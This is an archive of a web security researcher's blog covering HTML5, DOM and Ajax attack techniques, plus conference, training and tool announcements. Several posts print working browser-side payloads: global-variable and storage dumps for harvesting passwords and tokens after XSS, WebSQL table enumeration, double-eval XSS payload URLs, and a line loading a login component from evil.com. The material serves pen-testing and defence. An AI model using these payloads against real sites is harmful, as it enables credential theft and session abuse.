Shreeraj's security blog

Password extraction from Ajax/DOM/HTML5 routine – Poor programming calls

2012-01-13T04:20:00.000-08:00

Login Ajax routine is an interestingplace to check for variable definition and assignments with respect to "single DOM application"/HTML5/Web2.0 framework. If variables are not created with proper scopethen can be accessed as global and contain interesting information like username,password, tokens etc. Interestingly we need to do lot of JavaScript analysiswith Web 2.0, Ajax, HTML5 and Single DOM applications.

For example, here is a routine for login. It can be buried inone of the JS files but gets loaded on DOM at the point of call and remainthere throughout application life cycle.

functiongetLogin()

{

gb= gb+1;

varuser = document.frmlogin.txtuser.value;

varpwd = document.frmlogin.txtpwd.value;

varxmlhttp=false;

try {

xmlhttp = newActiveXObject("Msxml2.XMLHTTP");

// other code for XHR initialization

}

temp ="login.do?user="+user+"&pwd="+pwd;

xmlhttp.open("GET",temp,true);

xmlhttp.onreadystatechange=function()

{

//other code on state ready change

}

xmlhttp.send(null);

}

Here, temp variable is crafting URL and posting username andpassword for Ajax call. It can be part of POST if going through send(). “temp” variableis very loosely defined as global and can be accessed from the DOM.

It is easy to access those variables from DOM – Yes, needDOM based XSS but coding practice is poor over here. Payload to exploit thevulnerability…

for(i in window){

obj=window[i];

try{

if(typeof(obj)=="string"){

console.log(i);

console.log(obj.toString());

}

}catch(ex){}

}

You will get “temp” variable with following value - login.do?user=foo&pwd=foobar.

Blind WebSQL and Storage extraction for HTML5 Apps

2012-01-07T03:53:00.000-08:00

HTML5 is having two important data points – WebSQL andStorage. They are controlled by well defined RFCs and specifications. TheseAPIs can be accessed using JavaScript. Assuming we get an entry into DOM thenalso we are completely blind with WebSQL table names and storage keys. Here isa way to enumerate that data during pen-testing and assessments.

Blind WebSQL Enumeration

We need following information to extract target content.

1. Database object

2. Table structure created on SQLite

3. User table on which we need to run select query

Here is the script which can harvest database withzero knowledge

vardbo;

vartable;

varusertable;

for(iin window){

obj = window[i];

try{

if(obj.constructor.name=="Database"){

dbo= obj;

obj.transaction(function(tx){

tx.executeSql('SELECTname FROM sqlite_master WHERE type=\'table\'',[],function(tx,results){

table=results;

},null);

});

}

}catch(ex){}

}

if(table.rows.length>1)

usertable=table.rows.item(1).name;

a.) We will run through all objects and get objectwhere constructor is “Database”

b.) We will make Select query directly tosqlite_master database

c.) We will grab 1^st table leaving webkittable on 0^th entry

We got the actual table name residing on WebSQL forthis application, next we can run SQL query and loop through results.

We got the name of the table and now we can use same database object to run the query through script.

Hence, it can be part of payload during testing to fetchdata remotely.

Blind Storage Enumeration

Storage enumeration is relatively easy, We can check forobject length for local or session storage and if it is not zero run a loop andget all values. We can use following code for localStorage.

if(localStorage.length){

console.log(localStorage.length)

for(iin localStorage){

console.log(i)

console.log(localStorage.getItem(i));

}

Here is the output for the call.

Global Sensitive Information Extraction from DOM – post DOM based XSS

2012-01-04T05:35:00.000-08:00

DOM centered single page HTML5 and Web 2.0 applications are using GLOBALvariables to manage client side critical information. During consulting we haveseen few applications managing client side session data on GLOBALS. Theseglobal objects are using JSON or Array. In some cases they are string as well.

For example,

Once user gets authenticated it gets a Script tag and alongwith an array like below to set global set of variables.

var arrayGlobals =['my@email.com',"12141hewvsdr9321343423mjfdvint","test.com"];

In many cases it has sensitive information like tokens,public profile URLs, private URLs for information access, cross domain oAuthvalues, user/pass as temp variables etc. It has interesting set of informationand it can be extracted in case of DOM based XSS. These DOM driven applicationsare single page and these set of values are accessible across application life cycle.

Here is an example of extracting JSON, Array and string frombrowser. It can be used as part of XSS testing and exploitation once it isfound. It is interesting to add in XSS exploitation tools like BeeF. We areusing it with node.js and customized payload for our routine test cases.

Below script will look for object and using JSON.stringfyfor Firefox only else jquery plugin can help.

for(i in window){

obj=window[i];

if(obj!=null||obj!=undefined)

var type = typeof(obj);

if(type=="object"||type=="string")

{

console.log("Name:"+i)

try{

my=JSON.stringify(obj);

console.log(my)

}catch(ex){}

}

Just to fetch extracted values we are running in firebugand redirecting on console.

Really interesting stuff – check with your popularmailing and social networking sites.

Cross Origin Resource Jacking (CORJacking) - DOM based attack vector

2011-12-22T22:55:00.000-08:00

CSRF and UI Redressing (Click/Tab/Event Jacking) attackvectors are popular ways to abuse cross domain HTTP calls and events. HTML5, Web2.0 and RIA (Flash/Silverlight) applications are loaded in browser with nativestate or using plug-ins. DOM used to be an integral part of the browser and nowit is becoming even more important aspect with reference to web applications.Web applications are using DOM in very complex and effective way to serve theirclient better and leveraging all possible features allowed by DOM specifications.

There are many applications run as single DOM app and onceit gets loaded, it remains in scope across the application life cycle. CORS andSOP have to play critical role in protecting Cross Origin Resources and control relevantHTTP calls. HTML5 and RIA applications are having various different resources likeFlash files, Silverligh, video, audio etc. These resources are loaded in theirown little object space which is defined by specific tag. These resources areaccessible by DOM and can be manipulated as well. If DOM is forced tochange underlying resource on the fly and replaced by cross origin/domainresource then it causes Cross Origin Resource Jacking (CROJacking).

Example,

Let’s assume there are two domains – foobank.com andevil.com. Foobank application is having flash driven application and it has itsown login swf (login.swf) file. This flash component is loaded via object inthe browser. If by DOM call this login.swf file is replaced by similar fileresiding on evil.com then it will cause CORJacking and user would be underimpression that he/she is using foobank.com resources. Also, reverse would bepossible as well. Evil.com loads resources residing on Foobank.com domain and itwill cause reverse CORJacking.

Here is a small DEMO of CORJacking with Flash resource.

Here is the object tag loading flash component

HTML page is loaded in the browser and this object which iscoming from foobank.com domain is being loaded. Assuming this page has DOMbased issue and possible to inject/manipulate this value. Hence, if we want toaccess src of this object tag then through DOM we get its access.

Interestingly document.getElementsByName(‘Login’).item(0).srcis not just read only value, one can assign a cross origin resource to it onthe fly.

Hence, below line will actually change the resource andloads login.swf file from evil.com domain.

document.getElementsByName(‘Login’).item(0).src = ‘http://evil.com/login.swf’

This will clearly hijack the resource and user will be underimpression that it is negotiating with foobank’s login component but actualcomponent is from evil domain. This is the case of CORJacking and reverse canbe done as well. Evil domain can load Foobank component and causes reverseCORJacking.

Since browser is allowing these Cross Origin Resource accessone needs to embed defense in similar way we are doing for ClickJacking.Before component being loaded, component should have sense of domain anddisallow its execution on cross domain as far as reverse CORJacking is concern.For CORJacking one needs to lock object using JavaScript, controlling streamand avoid DOM based injection issues to stop CORJacking exploitation.

[Note – This type of loading is not restricted to one typeof resource only, it is applicable to different types of resources and browser's ability to process cross origin resource loading. It is possible to createvarious different variants of these attack vector like flashjacking, silverlightjacking,mediajacking etc. inherited from UI redressing family - interesting area for research, will add a paper on it soon.]

Top 10 HTML5 Threats & Attack Vectors

2011-12-08T22:05:00.001-08:00

Emerging as popular standard to create Rich Internet Applications and competing with technology stacks like Adobe’s Flex/Flash and Microsoft’s Silverlight is HTML5[1]. HTML5 brings several new features and functionalities that allow developers to create really attractive and robust applications. These applications can run on any browser and platform, although with some limitations. HTML5 applications are also supported by mobile devices. Hence, you can create your application once and run it on several devices and browsers. Each time, every new technology stack throws up new security challenges and vulnerabilities. HTML 5, though very promising, is no different. There are security concerns that need to be addressed when creating applications. Let us look at the top 10 possible attack vectors associated with HTML5 and modern browser architecture.

Read full article here (net-security.org)

Top 10 Attack Vectors

1. ClickJacking& Phishing by mixing layers and iframe

2. CSRFand leveraging CORS to bypass SOP

3. AttackingWebSQL and client side SQL injection

4. Stealinginformation from Storage and Global variables

5. HTML5 tag abuse and XSS

6. HTML5/DOM based XSS and redirects

7. DOMinjections and Hijacking with HTML 5

8. Abusingthick client features

9. UsingWebSockets for stealth attacks

10.AbusingWebWorker functionality

Browser Attack Surface and Layers

OWASP and Blackhat (Movie and Paper) - HTML5, XHR and DOM Security

2011-12-06T22:04:00.000-08:00

Presented at OWASP AppSecUS 2011

Next Generation Web Attacks - HTML 5, DOM (L3) and XHR (L2) with Shreeraj Shah, Blueinfy Solutions Pvt. Ltd. from OWASP on Vimeo.

Paper presented at Blackhat USA 2011

Blackhat11 shreeraj reverse_engineering_browser

View more documents from Shreeraj Shah

Double eval() for DOM based XSS

2011-12-02T22:14:00.001-08:00

DOM based XSS are becoming relatively common with Web 2.0and Ajax driven applications. DOM based applications are using eval() method toinject new stream into the existing DOM. In certain cases it is becomingtricky to pass on the values for pen-testing and to create an abuse/exploitscenario. Recently during consulting we came across different DOM based XSS andobjective is to get a pop-up to confirm the vulnerability. If we get an evalcall then it is possible to double eval-ing to convert text back into payload.

Here is a simple scenario; it can be complicated on case tocase basis.

For example, we have following line in the code

eval('getProduct('+koko.toString()+')');

Here “koko” is coming from URL or controlled by user. Hence,if we pass on the value in following URL it gets to the “getProduct” function.

http://192.168.3.2/catalog.aspx?pid=3

Testing scenario is simple, it causes DOM based XSS withfollowing condition.

http://192.168.3.2/catalog.aspx?pid=3’);//

We are passing payload terminating function, endingstatement and commenting out rest of the script. We get a simple pop-up if wepass on following code.

http://192.168.3.2/catalog.aspx?pid=3’);alert(1)//

But to prove a point if we want to craft any other payloadwhere we need to send single quote, for example want to execute “document.getElementsByName('Login')”will not work since we have that single quote that will raise syntax error. Forsimplicity if we pass on alert(‘hi’), it will not work and we will not getpopup in above scenario.

http://192.168.3.2/catalog.aspx?pid=3’);alert(‘hi’)//

We get following error in the browser.

Error: syntax error

Source File: http://192.168.3.2/catalog.aspx?pid=3%27);elval(alert(%27hi%27));//

Line: 37, Column: 29

Source Code:

getProduct(3%27);elval(alert(%27hi%27));//)

Interestingly, we can leverage double eval() in this case, wepass on following payload and let’s see what happens…

http://192.168.3.2/catalog.aspx?pid=3’);eval(String.fromCharCode(97,108,101,114,116,40,39,104,105,39,41))//

It will avoid error and we will get a pop-up. What we didwas simple, we used fromCharCode function and passed on decimal values foralert(‘hi’) here, first eval will convert it into string and second eval willexecute the code. Hence, double eval can rescue while testing DOM based XSS.

Curiously I searched this trick on web if people are usingit and came across this article - http://blogs.msdn.com/b/infopath/archive/2006/04/05/569338.aspx

Double eval() can be leveraged for string operations and concatenation.

CSRF with JSON – leveraging XHR and CORS

2011-11-28T21:55:00.000-08:00

Same Origin Policy (SOP) dictates cross domain calls andallows establishment of cross domain connections. SOP bypasses allow CSRFattack vector, an attacker can inject a payload on cross domain page thatinitiate a request without consent or knowledge of the target user. HTML 5 ishaving one more policy in place called CORS (Cross Origin Resource Sharing).CORS is a “response blind” technique and controlled by extra added HTTP header“orgin” and their variants but it allows request to hit the target in one waydirection. Hence, it is possible to do one-way CSRF. It is possible to initiateCSRF vector using XHR-Level 2 on HTML 5 pages and can prove really lethalattack vector. XHR establishes a stealth connection and remains much hidden,XHR connection can be set using “withCredentials” as true along with POSTmethod. It allows cookie to replay and helps in crafting successful CSRFscenario or session riding. Interestingly HTML 5 along with CORS allowsperforming file upload CSRF as well. It is possible to craft a JavaScript usingXHR and inject JSON payload as cross domain. If server side code on JSONlibrary is not validating the “Content-Type” then it will process the requestand allows successful CSRF.

For example,

Here is a script which will do CSRF on cross domain.

Here, we have “Content-Type” as “text-plain” and no new extra header added so CORS will not initiate OPTIONSto check rules on the server side and directly make POST request. At the same time we have kept credential to “true”so cookie will replay.

On the wire we can see followingrequest.

As you can see cookie isreplayed and JSON POST has been initiated. We get following response back fromapplication.

Application processedthe request and sent JSON back. It is clear case of CSRF. This can be appliedto other streams as well.

Training at Syscan - Web Hacking – Threats & Countermeasure

2011-03-30T01:02:00.000-07:00

Web Hacking – Threats & Countermeasure

Introduction and adaptation of new technologies like Ajax, Rich Internet Applications and Web Services has changed the dimension of Web Hacking and Security. We are witnessing new ways of hacking and exploiting web based applications and it needs better understanding of technologies to perform penetration testing and assessment of web security. The course is designed by the author of “Web Hacking: Attacks and Defense”, “Hacking Web Services” and “Web 2.0 Security – Defending Ajax, RIA and SOA” bringing his experience in application security and research as part of curriculum to address new challenges for pen-testers, consultants, auditors and QA teams. Web Hacking 2.0 is extensively hands-on class with real life challenges and lab exercises. Participants would be methodically exposed to various different attack vectors and exploits. The learning sessions feature real life cases, hands one exercises, new scanning tools and exploits.

Visit syscan training page - here

HTML 5, XHR (L2) and DOM (L3) - Top 10 Attacks

2011-03-23T00:35:00.000-07:00

Current stack and technology surface

Top 10 Attack Vectors

1. XSS abuse with tags and attributes
2. DOM based XSS and Redirects
3. Stealing from the storage
4. Injecting and Exploiting WebSQL
5. Abusing network API and Sockets
6. CSRF across streams – JSON, AMF and XML
7. Sandbox attacks and ClickJacking
8. Abusing new features like drag-and-drop
9. Botnet/Spynet gets persistent life using WebWorkers
10. Threats to widgets and mashups

DOM Hacking - Paper and Tools

2010-09-24T22:43:00.000-07:00

DOM Hacking was presented at BlackHat and going to present at next HackInTheBox. Here is the paper and Tools (DOMScan and DOMTracer). It helps during scanning, assessments and pen-testing. Enjoy!

Paper on DOM Hacking

Download
PDF document from here [BlackHat site]
Presentation slides from here [BlackHat site]

DOMScan (Beta)
DOMScan - Scanning and Analyzing DOM

DOMScan is utility to drive IE and capture real time DOM from the browser. It gives access to active DOM context along with JavaScripts. One can observe the DOM in detail using this utility. It has predefined rules to scan DOM. One can run the scan on existing DOM and fetch interesting entry points and calls. It allows tracing through JavaScript variables as well. Using this utility one can identify following vulnerabilities.

• DOM based XSS
• DOM based vulnerable calls
• Source of abuse and external content loading methods
• Possible DOM logic and business layer calls
• Same Origin Bypass calls and usage
• Mashup usage inside DOM
• Widget Architecture review using the tool

Download

DOMTracer (Beta)
DOMTracer - Firefox Plugin (Trace DOM and JavaScript Calls)

The DOM as seen in all the aforementioned cases needs to be analyzed in many aspects. Run-time analysis of the DOM/JavaScript is vital and aids one to look at the calls made during the ‘dynamic DOM manipulation’. The DOMTracer is a Firefox Extension for this same purpose. It has been written using the standard method of writing extensions using the XUL platform and the JavaScript language in majority. This is in beta and we are working on new features.

Download

HITB - Malaysia

2010-09-23T21:40:00.000-07:00

Training - TT1 – Web 2.0 Hacking – Advanced Attacks and Defense (Ajax, RIA and SOA)

Hacking a Browser’s DOM – Exploiting Ajax and RIA

Web 2.0 applications are using dynamic DOM manipulations extensively for presenting JSON or XML streams in the browser. These DOM calls mixed with XMLHttpRequest (XHR) object are part of client side logic written in JavaScript or part of any other client side technology be it Flash or Silverlight. DOM driven XSS is a sleeping giant in the application code and it can be exploited by an attacker to gain access to the end user’s browser/desktop. This can become a root cause of following set of interesting vulnerabilities – Cross Widget Sniffing, RSS feed reader exploitation, XHR response stealing, Mashup hacking, Malicious code injection, Spreading Worm etc. This set of vulnerability needs innovative way of scanning the application and corresponding methodology needs to be tweaked. We have seen DOM driven XSS exploited in various different popular portals to spread worm or virus. This is a significant threat on the rise and should be mitigated by validating un-trusted content poisoning Ajax or Flash routines. DOM driven XSS, Cross Domain Bypass and CSRF can cause a deadly cocktail to exploit Web 2.0 applications across Internet. This presentation will be covering following important issues and concepts.

* Web 2.0 Architecture and DOM manipulation points
* JavaScript exploits by leveraging DOM
* Cross Domain Bypass and Hacks
* DOM hacking for controlling Widgets and Mashups
* Exploiting Ajax routines to gain feed readers
* Scanning and detecting DOM driven XSS in Web 2.0
* Tools for scanning the DOM calls
* Mitigation strategies for better security posture

Secure SDLC and Static Code Analytics ...

2010-04-27T17:10:00.000-07:00

Secure SDLC for Software

View more presentations from shreeraj.

Defending Against Top Web Attacks of 2010

2010-04-27T17:08:00.000-07:00

Web Attacks - Top threats - 2010

View more presentations from shreeraj.

Future Trainings and Talks ...

2010-02-25T00:09:00.000-08:00

	InfoSecWorld 10 - Orlando Web 2.0 Hacking: Attacks and Defense HANDS-ON
	InfoSecWorld 10 - Orlando Defending Against the Worst Web-Based Application Vulnerabilities of 2010 Secure SDLC for Software Assurance
	HackInTheBox - Dubai Web Application Security – Threats & Countermeasures

SecurityByte & OWASP event in India

2009-10-25T08:49:00.001-07:00

Blueinfy is conducting one day workshop and sharing research at this event.

Cloud Hacking – Distributed Attack & Exploit Platform

We are witnessing applications, networks and infrastructures moving towards cloud computing. These clouds are emerging as a common platform to perform distributed attacks. Web/Enterprise 2.0 technologies are adding a new dimension to compromise cloud security. In this talk following topics will be covered with real life cases, tools and demonstrations.

Fingerprinting and Footprinting clouds and resources
Clouds internals and discoveries
Cloud applications’ internal APIs and session hijacking & fixations
Privilege and authorization escalations in cloud computing
Network and Operating Systems hacks inside clouds
Exploiting client side of cloud users
Attack methods and exploits
Impact analysis of cross domain access inside cloud - Twitter, Facebook, LinkedIn, MySpace etc.
Google’s model and security threats – lessons to learn
Live hacks and demos
Tools to take away

Advanced Web Hacking – Securing Ajax, RIA and SOA

Introduction and adaptation of new technologies like Ajax, Rich Internet Applications and Web Services has changed the dimension of Application Hacking. We are witnessing new ways of hacking web-based applications and it needs better understanding of technologies to secure applications. The only constant in this space is change. In this dynamically changing scenario in the era of Web 2.0 it is important to understand new threats that emerge in order to build constructive strategies to protect corporate application assets. Application layers are evolving and lots of client side attack vectors are on the rise like Ajax based XSS, CSRF, Widget injections, RSS exploits, Mashup manipulations and client side logic exploitations. At the same time various new attack vectors are evolving around SOA by attacking SOAP, XML-RPC and REST. It is time to understand these advanced attack vectors and defense strategies.
Research and Talk

Web 2.0 Hacking class at DeepSec from Blueinfy

2009-10-02T22:23:00.000-07:00

Introduction and adaptation of new technologies like Ajax, Rich Internet Applications and Web Services has changed the dimension of Application Hacking. We are witnessing new ways of hacking web based applications and it needs better understanding of technologies to secure applications. The only constant in this space is change. In this dynamically changing scenario in the era of Web 2.0 it is important to understand new threats that emerge in order to build constructive strategies to protect corporate application assets. Application layers are evolving and lot of client side attack vectors are on the rise like Ajax based XSS, CSRF, Widget injections, RSS exploits, Mashup manipulations and client side logic exploitations. At the same time various new attack vectors are evolving around SOA by attacking SOAP, XML-RPC and REST. It is time to understand these advanced attack vectors and defense strategies. The course is designed by the author of --Web Hacking: Attacks and Defense--, “Hacking Web Services” and “Web 2.0 Security – Defending Ajax, RIA and SOA” bringing his experience in application security and research as part of curriculum to address new challenges. Application Hacking 2.0 is hands-on class. The class features real life cases, hands one exercises, new scanning tools and defense mechanisms. Participants would be methodically exposed to various different attack vectors and exploits. In the class instructor will explain new tools like wsScanner, scanweb2.0, AppMap, AppCodeScan etc. for better pen-testing and application audits.

Visit here for detail on event

Secure Coding Class in Singapore

2009-10-01T05:38:00.000-07:00

We are conducting class in Singapore from 25th-27th November. Detail over here

Description

Enterprise application source code, independent of languages and platforms, is a major source of vulnerabilities. The class is designed and developed to focus on enterprise architecture and application analytics to discover vulnerabilities. One of the CSI surveys on vulnerability distribution suggests that in 64% of cases, a vulnerability crops up due to programming errors and in 36% of cases, due to configuration issues. We will be covering analysis techniques, with tools, for assessment and review of enterprise application source code. Enterprise 2.0 and mashups, along with other different Web 2.0 concepts, reinforced by hands-on experience, will help in understanding next generation application requirements.

It is imperative to know source code review methodologies and strategies for analysis. The emphasis of the class would be to develop a complete understanding of source code analysis, audit methodologies, techniques and tools. Knowledge gained would help in analyzing and securing enterprise applications at all different stages - architecture, design and/or development. The course is designed by the author of "Web Hacking: Attacks and Defenses", "Hacking Web Service" and "Web 2.0 Security - Defending Ajax, RIA and SOA", bringing his experience in application security and research to the curriculum. Special focus is given to compliance and Top-25 errors for enterprise applications.

This class is hands-on and needs laptops to implement its numerous exercises designed to run hand-in-hand with their concepts. The class features real life cases, hands-on exercises, code scanning tools and defense plans. Participants would be methodically taken down to the source code level and exposed to the possible flaws in architecture, design and coding practices. The class would then focus on the proper ways of writing secure code and analyzing the code base.

Visit for full detail

Annual Conference IT Audit & Controls 2009

2009-09-29T07:31:00.000-07:00

Conducting workshop and talk ...

W3 Conducting an Enterprise Application Audit DEMO
Date: Monday, 12 October 2009
Time: 9am - 5pm

The focus of this workshop is to analyze applications within an enterprise architecture to discover vulnerabilities. You will learn scanning, auditing and source code review methodologies – all critical tools to enable application analysis. The workshop features real-life cases, demonstrations, scanning tools and defense plans.
This workshop will cover:
• The most common vulnerabilities and proven methodologies for their detection
• Auditing for compliance and standards like PCI-DSS, OWASP Top 10 and CVE/CWE Top 25 errors
• Common programming errors and source-code scanning methodologies
• Conducting an architecture and design audit to ensure security
• Securing SDLC with best practices
• Effective scanning tools and approaches
• Mitigation strategies and frameworks

5 Auditing and Securing Web/Enterprise 2.0 Applications and Architectures
Date: Tuesday, 13 October 2009
Time: 10:30am - 12pm

• Web 2.0 threats, hacks and incidents
• Auditing and assessing the security of Web 2.0 architectures and design
• Web 2.0 vulnerabilities and mitigation
• Discovering JSON-based SQL injections, XML-driven XSS, CSRF 2.0, RSS feed injections, widget exploits, mashup hacks and more
• Auditing Web 2.0 source code and frameworks
• New tools, methodologies and audit strategies for Web 2.0

OWASP - Belgium chapter talk...

2009-09-28T01:32:00.000-07:00

It was fun in presenting at OWASP Belgium chapter a week back before kicking the BruCON training on Web 2.0. Presented techniques on Web 2.0 assessments and some demos on scanning RIA and Flex apps.

PDF of presentation - here (http://www.owasp.org/index.php/File:Shreeraj_OWASP_Belgium.pdf)

Talk on - Application Source Code Audit - Why, What and How

2009-09-27T21:00:00.000-07:00

Enterprise application source code, independent of languages and platforms, is a major source of vulnerabilities. This talk is designed to focus on enterprise architecture and application analytics to discover vulnerabilities. One of the CSI surveys on vulnerability distribution suggests that in 64% of cases, a vulnerability crops up due to programming errors and in 36% of cases, due to configuration issues. We will be covering analysis and audit techniques, for assessment and review of enterprise application source code. Essentially all three important aspects of the audit will be addresses – Why it is needed, What to do and how to achieve.

Online meet - here (http://www.brighttalk.com/summit/itaudit2)

ScanEx - Scanning for iframe and script Injections and External References (Beta)

2009-09-10T03:25:00.000-07:00

This is a simple utility which runs against target site and look for external references and cross domain malicious injections. There are several vulnerable sites which get manipulated with these types of injections and compromised. The site gets registered with stopbadware and other databases as well. This tool helps in doing initial scanning to look from obvious injections. At this point it is looking into iframe and script tags as defined in regex file.

Download

Paper from Blueinfy Labs - Cross Widget DOM Spying

2009-09-08T06:19:00.000-07:00

Widgets, Gadgets or Modules are very common and powerful feature of Web 2.0 applications. It converts single loaded page in the browser to multi-threaded application. It allows end user to work on multiple little utilities and windows from one page. Widget framework is supported by various Ajax libraries and lot of code is getting created by developers to allow this feature. Once framework is in place various different users can leverage APIs and libraries to develop their own little widget and deploy on the application domain. Any user of the application can register that widget and start utilizing its feature. This scenario opens up possibility of Cross Widget DOM Spying. This paper is going to describe that scenario and its understanding.

Read here

Web 2.0 Hacking Training at BruCon...

2009-09-03T22:16:00.000-07:00

Training Detail ...

Introduction and adaptation of new technologies like Ajax, Rich Internet Applications and Web Services has changed the dimension of Application Hacking. We are witnessing new ways of hacking web based applications and it needs better understanding of technologies to secure applications. The only constant in this space is change. In this dynamically changing scenario in the era of Web 2.0 it is important to understand new threats that emerge in order to build constructive strategies to protect corporate application assets. Application layers are evolving and lot of client side attack vectors are on the rise like Ajax based XSS, CSRF, Widget injections, RSS exploits, Mashup manipulations and client side logic exploitations. At the same time various new attack vectors are evolving around SOA by attacking SOAP, XML-RPC and REST. It is time to understand these advanced attack vectors and defense strategies.

The course is designed by the author of "Web Hacking: Attacks and Defense", “Hacking Web Services” and “Web 2.0 Security – Defending Ajax, RIA and SOA” bringing his experience in application security and research as part of curriculum to address new challenges. Application Hacking 2.0 is hands-on class. The class features real life cases, hands one exercises, new scanning tools and defense mechanisms. Participants would be methodically exposed to various different attack vectors and exploits. In the class instructor will explain new tools like wsScanner, scanweb2.0, AppMap, AppCodeScan etc. for better pen-testing and application audits.

For more details see Web 2.0 Hacking – Attacks and Defense

Binging - Footprinting and Discovery Tool

2009-08-27T04:09:00.000-07:00

Binging is a simple tool to query Bing search engine. It will use your Bing API key and fetch multiple results. This particular tool can be used for cross domain footprinting for Web 2.0 applications, site discovery, reverse lookup, host enumeration etc. One can use various different directives like site, ip etc. and run queries against the engine. On top of it tool provides filtering capabilities so you can ask for unique URLs or hosts. It is also possible to filter results by applying power of regular expression. Get your Bing API key and use this tool for your audit, assessment and research.

Download

View more documents from Blueinfy Solutions.

AppPrint - Web, Application Server and Web 2.0 Fingerprinting tool (Beta)

2009-08-20T22:37:00.000-07:00

AppPrint scans IP range, IP or host for Web and Application servers. It scans port 80 for a particular target and tries to deduce the banner using httprint methodology. This gives best guessed banner for Web Server. In next step it uses method of forced plug-in invoke and scan for application server type. At this point it tries to fingerprint Tomcat, WebLogic, WebSphere, Orion, ColdFusion and Resin. It also fingerprints Web 2.0 libraries and components. It requires .NET framework installed. In future version we will build several other technology mapping and fingerprinting technologies like Flash, Laszlo etc. Also, planning to add WAF fingerprinting module.

Download

View more presentations from Blueinfy Solutions.

Web2Fuzz - AppSec Labs Tool....

2009-07-16T00:12:00.000-07:00

This tool is coded by our research and consulting team to test Web 2.0 applications. It is simple utility to check vulnerabilities while doing pen-testing and assessment. It is effective to use with Web2Proxy.

Here is tool detail..
Web2Fuzz (Beta)
Web 2.0 Application Auto Fuzzing tool

This tool helps in fuzzing next generation application running on Web/enterprise 2.0 platform. It can be used with Web2Proxy by harvesting JSON, XML, JS-Object etc. from already profiled HTTP requests. Adding various fuzz loads and injecting them into particular request. One can encode fuzz load in various forms to pollute/poison Web 2.0 streams. It is possible to analyze responses by using various techniques like response behavior, stream structure or patterns. Tool contains sample payload and pdf/slides can help you in giving better understanding of its behavior.

Download

PDF/Slides for tools

View more documents from Blueinfy Solutions.

Web Hacking Training at Syscan

2009-06-06T20:46:00.000-07:00

We are conducting 2 days hands-on training at Syscan 09. This event is going to be in Singapore starting from 30th June.

Training detail over here...

OWASP Event at Poland

2009-04-29T01:36:00.000-07:00

Blueinfy is having training for a day at OWASP

Web 2.0 Hacking – Attacks & Countermeasures, by Shreeraj Shah, Blueinfy

Detail on training

There is a talk on Web 2.0 Exploits as well. Agneda

Web2Proxy (Beta) - Web 2.0 Application Proxy, Profiling and Fuzzing tool

2009-04-25T01:16:00.000-07:00

This tool helps in assessing next generation application running on Web/enterprise 2.0 platform. It profiles HTTP requests and responses at runtime by configuring it as proxy. It identifies structures like JSON, XML, XML-RPC etc. along with key HTTP parameters like cookie, login forms, hidden values etc. Based on profile one can take decision to trap and fuzz requests to identify potential vulnerabilities. This tool needs .NET framework and tested on Windows platform. We are adding several new features to upcoming edition.

Blueinfy's tool page
Demo page for tool

Next class in Singapore...

2009-03-27T06:37:00.001-07:00

We are having a class in Singapore on 12th April.
Here is the detail on it.

Looking forward to meet few folks.

2009-02-25T20:32:00.000-08:00

Article on Web 2.0 cases and challenges is part of (IN)Secure magazine.

You can read it over here (March 09).

Abstract for the article.

Web 2.0 applications are emerging at a rapid pace and also penetrating deeper into the corporate structure as Enterprise 2.0 applications. Adaptations of Ajax, Flex, SOA, RSS Feeds, JSON structures, etc. are used continuously across applications. Old applications are getting a new look through these technologies and platforms, while fresh applications are written using only these building blocks.

By the end of 2008 we have seen and assessed a good amount of applications that are now well molded into a Web 2.0 framework. A Web 2.0 application adaptation is not restricted to one industry segment but applicable to all verticals like financing, insurance, portals, etc. If the Internet is the network of networks then Web 2.0 can be perceived as the application of applications.

Infosecworld 08 - Presenting Research...

2009-01-26T04:08:00.000-08:00

H8 Defending Against the Worst Web-Based Application Vulnerabilities in 2009 DEMO
Date: Wednesday, 11 March 2009
Time: 9:45am - 1pm
Track: Application Security

• Next generation attacks: SQL over JSON, XSS with RSS feeds, XPATH over SOAP
• Understanding the wide-spread XSS and CSRF attacks – why they help to build the worst kind of next generation Web-based worms and viruses spread through cross domain iframes
• Why scanning and detecting these application layer vulnerabilities are important for corporate enterprises
• How to defend against these attacks by providing content filtering over HTTP both for incoming and outgoing
• Source code scanning for Web 2.0 applications to protect applications against developer's mistakes
• Key tools and methodologies for both attacks and defense

Go To InfoSecWorld

HITB in Dubai

2009-01-20T03:16:00.001-08:00

At HITB Dubai we are going to have web security training and presentation on our new research methodology for Application Source Code Scanning for Web 2.0 Applications.

Here is a link to the training - GO

DeepSec 2008 - Training & Research

2008-11-08T18:53:00.000-08:00

[11th November] DEEPSEC security confernce - Vienna, Austria

Training on Enterprise Secure Application Coding

Presentation on Web 2.0 Security Game

HITB 2008 ...

2008-10-05T22:19:00.000-07:00

We are conducting training and speaking on Web 2.0 Attacks at HITB in Malaysia. They have great trainings and talks lined up this year as well. I look forward to meet lot of folks out there.

Training
Talk

2008-08-15T23:12:00.000-07:00

We have training and speaking event at OWASP Appsec in Delhi - India. Seems a great event.

More on it.

One Day Workshop Series

2008-07-20T02:40:00.000-07:00

We are conducting one day application security workshops in various cities in India. If you are interested in it.

More information here.

AppCodeScan 1.2 - Posted...

2008-06-24T05:57:00.000-07:00

We did some source code assessment and on the basis of it .NET application rules are added. Can download and play around with the tool.

Link to tools page

Secure Application Coding Training at Syscan Singapore

2008-06-11T22:48:00.000-07:00

[1st July 2008] Syscan - Singapore
Secure Application Coding Training

Application source code, independent of languages and platforms, is a major source for vulnerabilities. One of the CSI surveys on vulnerability distribution suggests that 64% of the time, a vulnerability crops up due to programming errors and 36% of the time, due to configuration issues. According to IBM labs, there is a possibility of at least one security issue contained in every 1,500 lines of code. To avoid these sort of security issues one needs to follow sound secure coding and design principals. It is also imperative to know code review methodologies and strategies to assess the quality of code before deploying to the production. The course is designed by the author of "Web Hacking: Attacks and Defense", “Hacking Web Services” and “Web 2.0 Security – Defending Ajax, RIA and SOA” bringing his experience in application security and research as part of curriculum.

Secure Coding course for Applications is hands-on class. The class features real life cases, hands one exercises, code scanning tools and defense plans. Participants would be methodically taken down to the source code level and exposed to the flaws in design and coding practices. The class would then focus on what are the proper ways of writing secure code and analyze the code base. This class addresses popular languages and platforms like VB/C# (.NET), Java(J2EE), PHP, ASP etc.

Paper on Blind SQL injection

2008-05-30T23:49:00.000-07:00

This paper describes technique to deal with blind SQL injection spot with ASP/ASP.NET applications running with access to XP_CMDSHELL. It is possible to perform pen test against this scenario though not having any kind of reverse access or display of error message. It can be used in completely blind environment and successful execution can grant remote command execution on the target application with admin privileges.

Download - PDF
Read here in HTML

HackInTheBox & RSA 2008- Blueinfy Training and Research

2008-03-20T03:57:00.000-07:00

